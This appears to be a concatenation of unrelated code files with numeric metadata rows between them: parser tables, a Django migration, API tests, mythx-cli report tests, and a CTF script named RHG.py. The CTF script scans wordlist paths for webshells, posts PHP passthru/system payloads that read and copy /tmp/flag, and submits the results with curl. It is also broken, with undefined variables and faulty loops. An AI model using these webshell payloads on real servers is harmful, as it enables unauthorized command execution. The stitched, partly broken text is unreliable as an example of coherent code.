('command -> LINE SYMBOL NUMBER NUMBER NUMBER SYMBOL NUMBER NUMBER NUMBER SYMBOL','command',10,'p_command_line','mdl.py',229),
('command -> MOVE NUMBER NUMBER NUMBER SYMBOL','command',5,'p_command_move','mdl.py',250),
('command -> MOVE NUMBER NUMBER NUMBER','command',4,'p_command_move','mdl.py',251),
('command -> SCALE NUMBER NUMBER NUMBER SYMBOL','command',5,'p_command_scale','mdl.py',259),
('command -> SCALE NUMBER NUMBER NUMBER','command',4,'p_command_scale','mdl.py',260),
('command -> ROTATE XYZ NUMBER SYMBOL','command',4,'p_command_rotate','mdl.py',268),
('command -> ROTATE XYZ NUMBER','command',3,'p_command_rotate','mdl.py',269),
('command -> FRAMES NUMBER','command',2,'p_command_frames','mdl.py',277),
('command -> BASENAME TEXT','command',2,'p_command_basename','mdl.py',282),
('command -> VARY SYMBOL NUMBER NUMBER NUMBER NUMBER','command',6,'p_command_vary','mdl.py',287),
('command -> VARY SYMBOL NUMBER NUMBER FXN','command',5,'p_command_vary','mdl.py',288),
('command -> SET SYMBOL NUMBER','command',3,'p_command_knobs','mdl.py',294),
('command -> SET_KNOBS NUMBER','command',2,'p_command_knobs','mdl.py',295),
('command -> AMBIENT NUMBER NUMBER NUMBER','command',4,'p_command_ambient','mdl.py',306),
('command -> CONSTANTS SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER','command',11,'p_command_constants','mdl.py',312),
('command -> CONSTANTS SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER','command',14,'p_command_constants','mdl.py',313),
('command -> LIGHT SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER','command',8,'p_command_light','mdl.py',319),
('command -> LIGHT SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER SYMBOL','command',15,'p_command_light','mdl.py',320),
('command -> SHADING SHADING_TYPE','command',2,'p_command_shading','mdl.py',329),
('command -> CAMERA NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER','command',7,'p_command_camera','mdl.py',335),
('command -> GENERATE_RAYFILES','command',1,'p_command_generate_rayfiles','mdl.py',340),
('command -> MESH CO TEXT','command',3,'p_command_mesh','mdl.py',344),
('command -> MESH SYMBOL CO TEXT','command',4,'p_command_mesh','mdl.py',345),
('command -> MESH CO TEXT SYMBOL','command',4,'p_command_mesh','mdl.py',346),
('command -> MESH SYMBOL CO TEXT SYMBOL','command',5,'p_command_mesh','mdl.py',347),
('command -> SAVE_KNOBS SYMBOL','command',2,'p_save_knobs','mdl.py',361),
('command -> SAVE_COORDS SYMBOL','command',2,'p_save_coords','mdl.py',367),
('command -> TWEEN NUMBER NUMBER SYMBOL SYMBOL','command',5,'p_tween','mdl.py',374),
('command -> FOCAL NUMBER','command',2,'p_focal','mdl.py',379),
('command -> WEB','command',1,'p_web','mdl.py',383),
('command -> TEXTURE SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER','command',14,'p_texture','mdl.py',387),
]
| 296.315789 | 17,093 | 0.633393 | 6,299 | 28,150 | 2.798698 | 0.053659 | 0.202167 | 0.223609 | 0.204209 | 0.842135 | 0.791764 | 0.770095 | 0.738045 | 0.710647 | 0.672755 | 0 | 0.41115 | 0.055631 | 28,150 | 94 | 17,094 | 299.468085 | 0.251994 | 0.002984 | 0 | 0.02381 | 1 | 0.011905 | 0.286875 | 0.001817 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 14 |
4fce394724a6eb8e0988f805e65bfee821048d82 | 8,606 | py | Python | jobs/migrations/0006_auto_20210825_1547.py | zain-Z/humimp | fd7e4e211dce62639e2fce2dd9f9506240a7a3d9 | [
"MIT"
] | null | null | null | jobs/migrations/0006_auto_20210825_1547.py | zain-Z/humimp | fd7e4e211dce62639e2fce2dd9f9506240a7a3d9 | [
"MIT"
] | null | null | null | jobs/migrations/0006_auto_20210825_1547.py | zain-Z/humimp | fd7e4e211dce62639e2fce2dd9f9506240a7a3d9 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.6 on 2021-08-25 13:47
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('jobs', '0005_auto_20210813_2335'),
]
operations = [
migrations.AlterField(
model_name='about',
name='text_about',
field=models.CharField(blank=True, default='', max_length=300, null=True),
),
migrations.AlterField(
model_name='contact',
name='email',
field=models.EmailField(blank=True, db_index=True, default='', max_length=255, null=True, unique=True),
),
migrations.AlterField(
model_name='contact',
name='full_name',
field=models.CharField(blank=True, default='', max_length=200, null=True),
),
migrations.AlterField(
model_name='contact',
name='message',
field=models.TextField(blank=True, default='', null=True),
),
migrations.AlterField(
model_name='contact',
name='phone',
field=models.CharField(blank=True, default='', max_length=17, null=True, unique=True, validators=[django.core.validators.RegexValidator(message="Phone number must be entered in the format: '+999999999'. Up to 14 digits allowed.", regex='^\\+?1?\\d{9,14}$')]),
),
migrations.AlterField(
model_name='contact',
name='subject',
field=models.CharField(blank=True, default='', max_length=200, null=True),
),
migrations.AlterField(
model_name='donate',
name='email_donate',
field=models.CharField(blank=True, default='', max_length=300, null=True),
),
migrations.AlterField(
model_name='donate',
name='facebook_link',
field=models.CharField(blank=True, default='', max_length=300, null=True),
),
migrations.AlterField(
model_name='donate',
name='instagram_link',
field=models.CharField(blank=True, default='', max_length=300, null=True),
),
migrations.AlterField(
model_name='donate',
name='location_donate',
field=models.CharField(blank=True, default='', max_length=300, null=True),
),
migrations.AlterField(
model_name='donate',
name='phone_donate',
field=models.CharField(blank=True, default='', max_length=300, null=True),
),
migrations.AlterField(
model_name='donate',
name='twitter_link',
field=models.CharField(blank=True, default='', max_length=300, null=True),
),
migrations.AlterField(
model_name='getinvolved',
name='text_careers_getinvolved',
field=models.CharField(blank=True, default='', max_length=300, null=True),
),
migrations.AlterField(
model_name='getinvolved',
name='text_joinus_getinvolved',
field=models.CharField(blank=True, default='', max_length=300, null=True),
),
migrations.AlterField(
model_name='index',
name='text_about_index',
field=models.CharField(blank=True, default='', max_length=300, null=True),
),
migrations.AlterField(
model_name='index',
name='text_story_index',
field=models.CharField(blank=True, default='', max_length=300, null=True),
),
migrations.AlterField(
model_name='index',
name='whatDoDetail_text',
field=models.CharField(blank=True, default='', max_length=300, null=True),
),
migrations.AlterField(
model_name='slider',
name='slide_subtitle_index',
field=models.CharField(blank=True, default='', max_length=300, null=True),
),
migrations.AlterField(
model_name='slider',
name='slide_title_index',
field=models.CharField(blank=True, default='', max_length=300, null=True),
),
migrations.AlterField(
model_name='visionmissionvalue',
name='Vission_Mission_Value_desc1',
field=models.CharField(blank=True, default='', max_length=300, null=True),
),
migrations.AlterField(
model_name='visionmissionvalue',
name='Vission_Mission_Value_desc2',
field=models.CharField(blank=True, default='', max_length=300, null=True),
),
migrations.AlterField(
model_name='visionmissionvalue',
name='mission_text',
field=models.CharField(blank=True, default='', max_length=300, null=True),
),
migrations.AlterField(
model_name='visionmissionvalue',
name='value_text',
field=models.CharField(blank=True, default='', max_length=300, null=True),
),
migrations.AlterField(
model_name='visionmissionvalue',
name='vission_text',
field=models.CharField(blank=True, default='', max_length=300, null=True),
),
migrations.AlterField(
model_name='whatwearedoingdetail',
name='whatDoDetail_desc1',
field=models.CharField(blank=True, default='', max_length=300, null=True),
),
migrations.AlterField(
model_name='whatwearedoingdetail',
name='whatDoDetail_desc2',
field=models.CharField(blank=True, default='', max_length=300, null=True),
),
migrations.AlterField(
model_name='whatwearedoingdetail',
name='whatDoDetail_desc3',
field=models.CharField(blank=True, default='', max_length=300, null=True),
),
migrations.AlterField(
model_name='whatwearedoingdetail',
name='whatDoDetail_desc4',
field=models.CharField(blank=True, default='', max_length=300, null=True),
),
migrations.AlterField(
model_name='whatwearedoingdetail',
name='whatDoDetail_desc5',
field=models.CharField(blank=True, default='', max_length=300, null=True),
),
migrations.AlterField(
model_name='whatwearedoingdetail',
name='whatDoDetail_desc6',
field=models.CharField(blank=True, default='', max_length=300, null=True),
),
migrations.AlterField(
model_name='whatwearedoingdetail',
name='whatDoDetail_desc7',
field=models.CharField(blank=True, default='', max_length=300, null=True),
),
migrations.AlterField(
model_name='whatwearedoingdetail',
name='whatDoDetail_icon_name',
field=models.CharField(blank=True, default='', max_length=300, null=True),
),
migrations.AlterField(
model_name='whatwearedoingdetail',
name='whatDoDetail_name',
field=models.CharField(blank=True, default='', max_length=300, null=True),
),
migrations.AlterField(
model_name='whoweare',
name='WhoWeAre_desc1',
field=models.CharField(blank=True, default='', max_length=300, null=True),
),
migrations.AlterField(
model_name='whoweare',
name='WhoWeAre_desc2',
field=models.CharField(blank=True, default='', max_length=300, null=True),
),
migrations.AlterField(
model_name='whoweare',
name='WhoWeAre_desc3',
field=models.CharField(blank=True, default='', max_length=300, null=True),
),
migrations.AlterField(
model_name='whoweare',
name='WhoWeAre_desc4',
field=models.CharField(blank=True, default='', max_length=300, null=True),
),
migrations.AlterField(
model_name='whoweare',
name='WhoWeAre_desc5',
field=models.CharField(blank=True, default='', max_length=300, null=True),
),
migrations.AlterField(
model_name='whoweare',
name='WhoWeAre_desc6',
field=models.CharField(blank=True, default='', max_length=300, null=True),
),
migrations.AlterField(
model_name='whoweare',
name='WhoWeAre_desc7',
field=models.CharField(blank=True, default='', max_length=300, null=True),
),
]
| 40.027907 | 283 | 0.582733 | 829 | 8,606 | 5.892642 | 0.12304 | 0.163767 | 0.204708 | 0.237462 | 0.875537 | 0.875537 | 0.867349 | 0.858342 | 0.832753 | 0.831934 | 0 | 0.02908 | 0.288752 | 8,606 | 214 | 284 | 40.214953 | 0.768992 | 0.005229 | 0 | 0.75 | 1 | 0 | 0.139502 | 0.017058 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.009615 | 0 | 0.024038 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
8b14ff4209de9aec609709eb65fd8c7bc8474f99 | 6,545 | py | Python | kobra/api/v1/tests/test_discount_registrations.py | karservice/kobra | 2019fd3be499c06d2527e80576fd6ff03d8fe151 | [
"MIT"
] | 4 | 2016-08-28T16:00:20.000Z | 2018-01-31T18:22:43.000Z | kobra/api/v1/tests/test_discount_registrations.py | karservice/kobra | 2019fd3be499c06d2527e80576fd6ff03d8fe151 | [
"MIT"
] | 25 | 2016-08-15T20:57:59.000Z | 2022-02-10T18:14:48.000Z | kobra/api/v1/tests/test_discount_registrations.py | karservice/kobra | 2019fd3be499c06d2527e80576fd6ff03d8fe151 | [
"MIT"
] | 1 | 2017-02-06T17:13:16.000Z | 2017-02-06T17:13:16.000Z | # -*- coding: utf-8 -*-
from rest_framework import status
from rest_framework.reverse import reverse
from rest_framework.test import APITestCase
from ....factories import (DiscountFactory, DiscountRegistrationFactory,
StudentFactory, UnionFactory, UserFactory)
class DiscountRegistrationApiTests(APITestCase):
def test_list_unauthenticated(self):
url = reverse('v1:discountregistration-list')
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_list_authenticated(self):
url = reverse('v1:discountregistration-list')
user = UserFactory()
self.client.force_authenticate(user)
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data, [])
def test_list_authenticated_unowned(self):
url = reverse('v1:discountregistration-list')
user = UserFactory()
# Creates a DiscountRegistration owned by someone else
DiscountRegistrationFactory()
self.client.force_authenticate(user)
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data, [])
def test_list_authenticated_owned(self):
url = reverse('v1:discountregistration-list')
user = UserFactory()
owned_discount_registration = DiscountRegistrationFactory()
owned_discount_registration.discount.ticket_type.event.organization.admins\
.add(user)
# Creates a DiscountRegistration owned by someone else
DiscountRegistrationFactory()
self.client.force_authenticate(user)
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data), 1)
self.assertEqual(response.data[0]['id'], str(owned_discount_registration.id))
def test_create_unauthenticated(self):
url = reverse('v1:discountregistration-list')
union = UnionFactory()
discount = DiscountFactory(union=union)
student = StudentFactory(union=union)
request_data = {
'discount': reverse(
'v1:discount-detail',
kwargs={'pk': discount.pk}),
'student': reverse(
'v1:student-detail',
kwargs={'pk': student.pk})
}
response = self.client.post(url, data=request_data)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_create_authenticated_unowned_discount(self):
url = reverse('v1:discountregistration-list')
user = UserFactory()
union = UnionFactory()
discount = DiscountFactory(union=union)
student = StudentFactory(union=union)
request_data = {
'discount': reverse(
'v1:discount-detail',
kwargs={'pk': discount.pk}),
'student': reverse(
'v1:student-detail',
kwargs={'pk': student.pk})
}
self.client.force_authenticate(user)
response = self.client.post(url, data=request_data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_authenticated_owned_discount(self):
url = reverse('v1:discountregistration-list')
user = UserFactory()
union = UnionFactory()
discount = DiscountFactory(union=union)
discount.ticket_type.event.organization.admins.add(user)
student = StudentFactory(union=union)
request_data = {
'discount': reverse(
'v1:discount-detail',
kwargs={'pk': discount.pk}),
'student': reverse(
'v1:student-detail',
kwargs={'pk': student.pk})
}
self.client.force_authenticate(user)
response = self.client.post(url, data=request_data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_create_authenticated_mismatching_union(self):
url = reverse('v1:discountregistration-list')
user = UserFactory()
discount_union = UnionFactory()
student_union = UnionFactory()
discount = DiscountFactory(union=discount_union)
discount.ticket_type.event.organization.admins.add(user)
student = StudentFactory(union=student_union)
request_data = {
'discount': reverse(
'v1:discount-detail',
kwargs={'pk': discount.pk}),
'student': reverse(
'v1:student-detail',
kwargs={'pk': student.pk})
}
self.client.force_authenticate(user)
response = self.client.post(url, data=request_data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_retrieve_unauthenticated(self):
discount_registration = DiscountRegistrationFactory()
url = reverse('v1:discountregistration-detail',
kwargs={'pk': discount_registration.pk})
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_retrieve_authenticated_unowned(self):
user = UserFactory()
discount_registration = DiscountRegistrationFactory()
url = reverse('v1:discountregistration-detail',
kwargs={'pk': discount_registration.pk})
self.client.force_authenticate(user)
response = self.client.get(url)
# Authenticated requests should be treated as 404 when retrieving an
# unowned discount registration
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
def test_retrieve_authenticated_owned(self):
user = UserFactory()
discount_registration = DiscountRegistrationFactory()
discount_registration.discount.ticket_type.event.organization.admins \
.add(user)
url = reverse('v1:discountregistration-detail',
kwargs={'pk': discount_registration.pk})
self.client.force_authenticate(user)
response = self.client.get(url)
# Authenticated requests should be treated as 404 when retrieving an
# unowned discount registration
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data['id'], str(discount_registration.id))
| 38.274854 | 85 | 0.653629 | 643 | 6,545 | 6.48367 | 0.133748 | 0.041017 | 0.082754 | 0.084433 | 0.828016 | 0.817222 | 0.796834 | 0.770449 | 0.717678 | 0.717678 | 0 | 0.012396 | 0.248128 | 6,545 | 170 | 86 | 38.5 | 0.83479 | 0.049045 | 0 | 0.748092 | 0 | 0 | 0.086887 | 0.050523 | 0 | 0 | 0 | 0 | 0.122137 | 1 | 0.083969 | false | 0 | 0.030534 | 0 | 0.122137 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8b4599387b157c1baa8108e647b8104e91c4b15c | 991 | py | Python | pubsub/testSimulate.py | moonyouj889/building_energy_consumption | 1ee4df03dcd5303788bba43ce4370567de6d5d5f | [
"Apache-2.0"
] | null | null | null | pubsub/testSimulate.py | moonyouj889/building_energy_consumption | 1ee4df03dcd5303788bba43ce4370567de6d5d5f | [
"Apache-2.0"
] | null | null | null | pubsub/testSimulate.py | moonyouj889/building_energy_consumption | 1ee4df03dcd5303788bba43ce4370567de6d5d5f | [
"Apache-2.0"
] | null | null | null | from send_meter_data import splitRow
# print(splitRow('2017-03-31T20:00:00-04:00,6443.0,1941.0,40.0,5397.0,2590.0',
# 'timestamp,1_Gen,1_Sub_1,1_Sub_3,2_Gen,2_Sub_1'))
assert(splitRow('2017-03-31T20:00:00-04:00,6443.0,1941.0,40.0,5397.0,2590.0',
'timestamp,Gen,Sub_1,Sub_3,Gen,Sub_1') ==
['2017-03-31T20:00:00-04:00,1,6443.0,1941.0,40.0',
'2017-03-31T20:00:00-04:00,2,5397.0,2590.0'])
print("Test1 Passed!")
# print(splitRow('2017-03-31T20:00:00-04:00,6443.0,1941.0,40.0,5397.0,2590.0,0.0',
# 'timestamp,1_Gen,1_Sub_1,1_Sub_3,2_Gen,2_Sub_1,3_Gen'))
assert(splitRow('2017-03-31T20:00:00-04:00,6443.0,1941.0,40.0,5397.0,2590.0,0.0',
'timestamp,Gen,Sub_1,Sub_3,Gen,Sub_1,Gen') ==
['2017-03-31T20:00:00-04:00,1,6443.0,1941.0,40.0',
'2017-03-31T20:00:00-04:00,2,5397.0,2590.0',
'2017-03-31T20:00:00-04:00,3,0.0'])
print("Test2 Passed!") | 58.294118 | 83 | 0.592331 | 203 | 991 | 2.768473 | 0.137931 | 0.096085 | 0.176157 | 0.208185 | 0.870107 | 0.870107 | 0.870107 | 0.870107 | 0.836299 | 0.836299 | 0 | 0.417391 | 0.187689 | 991 | 17 | 84 | 58.294118 | 0.280745 | 0.299697 | 0 | 0.166667 | 0 | 0.5 | 0.615942 | 0.578261 | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0 | true | 0.166667 | 0.083333 | 0 | 0.083333 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 14 |
8cea114f04cc6617f4c2f711f21495d28e272c7f | 2,615 | py | Python | CTF/RHG WEB/RHG.py | iriszero48/Trash | f93c7f36eb860ae15e5c95db6d1d28ede10698c2 | [
"MIT"
] | null | null | null | CTF/RHG WEB/RHG.py | iriszero48/Trash | f93c7f36eb860ae15e5c95db6d1d28ede10698c2 | [
"MIT"
] | null | null | null | CTF/RHG WEB/RHG.py | iriszero48/Trash | f93c7f36eb860ae15e5c95db6d1d28ede10698c2 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import requests
import sys
import re
import requests
import os
import api
from functools import *
#scan = lambda url:[url + i for i in open("word.txt","r").read().split('\n') if requests.get(url+i).status_code == 200][0]
FuckShellPost = lambda url: [url + i for i in open("word.txt","r").read().split("\n") if "hackbyatd" in requests.post(url=(url + i), data={i:"echo hackbyatd;"}).text]
def GetFlagPost(url):
try:
return re.findall("flag\{([^}]*)\}",requests.post(url=url, data={i:"passthru(\"echo `cat /tmp/flag`\");"}).text)
except Exception as e:
try:
return re.findall("flag\{([^}]*)\}",requests.post(url=url, data={i:"system(\"echo `cat /tmp/flag`\");"}).text)
except Exception as e:
try:
return re.findall("flag\{([^}]*)\}",requests.post(url=url, data={i:'system("cp /tmp/flag /var/www/html/flag1");system("echo `cat /tmp/flag`"); '}).text)
except Exception as e:
try:
return re.findall("flag\{([^}]*)\}",requests.post(url=url, data={i:'passthru("cp /tmp/flag /var/www/html/flag1");system("echo `cat /tmp/flag`"); '}).text)
except Exception as e:
return []
FuckShellGet = lambda url: [url + i for i in open("word.txt","r").read().split("\n") if "hackbyatd" in requests.get(url=(url + i), data={i:"echo hackbyatd;"}).text]
def GetFlagGet(url):
try:
return re.findall("flag\{([^}]*)\}",requests.get(url=url, data={i:"passthru(\"cat /tmp/flag\");"}).text)[0]
except Exception as e:
try:
return re.findall("flag\{([^}]*)\}",requests.get(url=url, data={i:"system(\"cat /tmp/flag\");"}).text)[0]
except Exception as e:
try:
return re.findall("flag\{([^}]*)\}",requests.get(url=url, data={i:'system("cp /tmp/flag /var/www/html/flag1");system("cat flag1"); '}).text)[0]
except Exception as e:
try:
return re.findall("flag\{([^}]*)\}",requests.get(url=url, data={i:'passthru("cp /tmp/flag /var/www/html/flag1");system("cat flag1"); '}).text)[0]
except Exception as e:
return []
[os.system('curl -k -d "answer="' + r + ' -X POST -v --user ' + USER + ':' + PWD + ' https://ip/api/sub_answer') for us in FuckShellPost("http://" + sys.argv[1]) for u in us for f in GetFlagPost(u)]
[os.system('curl -k -d "answer="' + r + ' -X POST -v --user ' + USER + ':' + PWD + ' https://ip/api/sub_answer') for us in FuckShellGet("http://" + sys.argv[1]) for u in us for f in GetFlagGet(u)]
| 53.367347 | 198 | 0.5587 | 374 | 2,615 | 3.898396 | 0.197861 | 0.053498 | 0.060357 | 0.098765 | 0.845679 | 0.837449 | 0.837449 | 0.833333 | 0.833333 | 0.789438 | 0 | 0.008273 | 0.214149 | 2,615 | 48 | 199 | 54.479167 | 0.701217 | 0.054302 | 0 | 0.512821 | 0 | 0.102564 | 0.268016 | 0.054251 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051282 | false | 0.102564 | 0.179487 | 0 | 0.487179 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
50ac13cd434a6d7a968f0f0025250ae516a5e4e1 | 18 | py | Python | student_num.py | starking999/sample_60195163 | 1126b7e608135bf245617f78f14f1237ec37b661 | [
"MIT"
] | null | null | null | student_num.py | starking999/sample_60195163 | 1126b7e608135bf245617f78f14f1237ec37b661 | [
"MIT"
] | null | null | null | student_num.py | starking999/sample_60195163 | 1126b7e608135bf245617f78f14f1237ec37b661 | [
"MIT"
] | null | null | null | print("60195163")
| 9 | 17 | 0.722222 | 2 | 18 | 6.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.470588 | 0.055556 | 18 | 1 | 18 | 18 | 0.294118 | 0 | 0 | 0 | 0 | 0 | 0.444444 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
0fcf6fe039de116f2d8d733fba6b871883591faa | 8,740 | py | Python | tests/test_report.py | Player1-PlaySwap/mythx-cli | defc59e2a8732a6e2e550ac62ded5a46c32a780b | [
"MIT"
] | 58 | 2019-09-13T13:42:33.000Z | 2022-03-28T11:37:54.000Z | tests/test_report.py | Player1-PlaySwap/mythx-cli | defc59e2a8732a6e2e550ac62ded5a46c32a780b | [
"MIT"
] | 48 | 2019-09-17T19:28:55.000Z | 2022-03-18T03:28:48.000Z | tests/test_report.py | Player1-PlaySwap/mythx-cli | defc59e2a8732a6e2e550ac62ded5a46c32a780b | [
"MIT"
] | 17 | 2019-09-17T06:49:38.000Z | 2022-03-02T19:24:00.000Z | import json
from click.testing import CliRunner
from mythx_models.response import AnalysisInputResponse, DetectedIssuesResponse
from mythx_cli.cli import cli
from .common import get_test_case, mock_context
INPUT_RESPONSE = get_test_case(
"testdata/analysis-input-response.json", AnalysisInputResponse
)
ISSUES_RESPONSE = get_test_case(
"testdata/detected-issues-response.json", DetectedIssuesResponse
)
ISSUES_SIMPLE = get_test_case("testdata/detected-issues-simple.txt", raw=True)
ISSUES_TABLE = get_test_case("testdata/detected-issues-table.txt", raw=True)
def test_report_tabular():
runner = CliRunner()
with mock_context():
result = runner.invoke(
cli, ["analysis", "report", "ab9092f7-54d0-480f-9b63-1bb1508280e2"]
)
assert result.output == ISSUES_TABLE
assert result.exit_code == 0
def test_report_tabular_blacklist():
runner = CliRunner()
with mock_context():
result = runner.invoke(
cli,
[
"analysis",
"report",
"--swc-blacklist",
"SWC-110",
"ab9092f7-54d0-480f-9b63-1bb1508280e2",
],
)
assert "Assert Violation" not in result.output
assert (
"/home/spoons/diligence/mythx-qa/land/contracts/estate/EstateStorage.sol"
not in result.output
)
assert result.exit_code == 0
def test_report_tabular_whitelist():
runner = CliRunner()
with mock_context():
result = runner.invoke(
cli,
[
"analysis",
"report",
"--swc-whitelist",
"SWC-110",
"ab9092f7-54d0-480f-9b63-1bb1508280e2",
],
)
assert "Assert Violation" in result.output
assert (
"/home/spoons/diligence/mythx-qa/land/contracts/estate/EstateStorage.sol"
in result.output
)
assert result.exit_code == 0
def test_report_tabular_filter():
runner = CliRunner()
with mock_context():
result = runner.invoke(
cli,
[
"analysis",
"report",
"--min-severity",
"high",
"ab9092f7-54d0-480f-9b63-1bb1508280e2",
],
)
assert "Assert Violation" not in result.output
assert (
"/home/spoons/diligence/mythx-qa/land/contracts/estate/EstateStorage.sol"
not in result.output
)
assert result.exit_code == 0
def test_report_json():
runner = CliRunner()
with mock_context():
result = runner.invoke(
cli,
[
"--format",
"json",
"analysis",
"report",
"ab9092f7-54d0-480f-9b63-1bb1508280e2",
],
)
assert json.loads(result.output)[0] == json.loads(ISSUES_RESPONSE.to_json())
assert result.exit_code == 0
def test_report_json_blacklist():
runner = CliRunner()
with mock_context():
result = runner.invoke(
cli,
[
"--format",
"json",
"analysis",
"report",
"--swc-blacklist",
"SWC-110",
"ab9092f7-54d0-480f-9b63-1bb1508280e2",
],
)
assert all(
x["swcID"] != "SWC-110" for x in json.loads(result.output)[0][0]["issues"]
)
assert result.exit_code == 0
def test_report_json_whitelist():
runner = CliRunner()
with mock_context():
result = runner.invoke(
cli,
[
"--format",
"json",
"analysis",
"report",
"--swc-whitelist",
"SWC-110",
"ab9092f7-54d0-480f-9b63-1bb1508280e2",
],
)
assert all(
x["swcID"] == "SWC-110" for x in json.loads(result.output)[0][0]["issues"]
)
assert result.exit_code == 0
def test_report_json_filter():
runner = CliRunner()
with mock_context():
result = runner.invoke(
cli,
[
"--format",
"json",
"analysis",
"report",
"--min-severity",
"high",
"ab9092f7-54d0-480f-9b63-1bb1508280e2",
],
)
assert all(
x["swcID"] != "SWC-110" for x in json.loads(result.output)[0][0]["issues"]
)
assert result.exit_code == 0
def test_report_json_pretty():
runner = CliRunner()
with mock_context():
result = runner.invoke(
cli,
[
"--format",
"json-pretty",
"analysis",
"report",
"ab9092f7-54d0-480f-9b63-1bb1508280e2",
],
)
assert json.loads(result.output)[0] == json.loads(ISSUES_RESPONSE.to_json())
assert result.exit_code == 0
def test_report_json_pretty_blacklist():
runner = CliRunner()
with mock_context():
result = runner.invoke(
cli,
[
"--format",
"json-pretty",
"analysis",
"report",
"--swc-blacklist",
"SWC-110",
"ab9092f7-54d0-480f-9b63-1bb1508280e2",
],
)
assert all(
x["swcID"] != "SWC-110" for x in json.loads(result.output)[0][0]["issues"]
)
assert result.exit_code == 0
def test_report_json_pretty_whitelist():
runner = CliRunner()
with mock_context():
result = runner.invoke(
cli,
[
"--format",
"json-pretty",
"analysis",
"report",
"--swc-whitelist",
"SWC-110",
"ab9092f7-54d0-480f-9b63-1bb1508280e2",
],
)
assert all(
x["swcID"] == "SWC-110" for x in json.loads(result.output)[0][0]["issues"]
)
assert result.exit_code == 0
def test_report_json_pretty_filter():
runner = CliRunner()
with mock_context():
result = runner.invoke(
cli,
[
"--format",
"json-pretty",
"analysis",
"report",
"--min-severity",
"high",
"ab9092f7-54d0-480f-9b63-1bb1508280e2",
],
)
assert all(
x["swcID"] != "SWC-110" for x in json.loads(result.output)[0][0]["issues"]
)
assert result.exit_code == 0
def test_report_simple():
runner = CliRunner()
with mock_context():
result = runner.invoke(
cli,
[
"--format",
"simple",
"analysis",
"report",
"ab9092f7-54d0-480f-9b63-1bb1508280e2",
],
)
assert result.output == ISSUES_SIMPLE
assert result.exit_code == 0
def test_report_simple_blacklist():
runner = CliRunner()
with mock_context():
result = runner.invoke(
cli,
[
"--format",
"simple",
"analysis",
"report",
"--swc-blacklist",
"SWC-110",
"ab9092f7-54d0-480f-9b63-1bb1508280e2",
],
)
assert "Assert Violation" not in result.output
assert result.exit_code == 0
def test_report_simple_whitelist():
runner = CliRunner()
with mock_context():
result = runner.invoke(
cli,
[
"--format",
"simple",
"analysis",
"report",
"--swc-whitelist",
"SWC-110",
"ab9092f7-54d0-480f-9b63-1bb1508280e2",
],
)
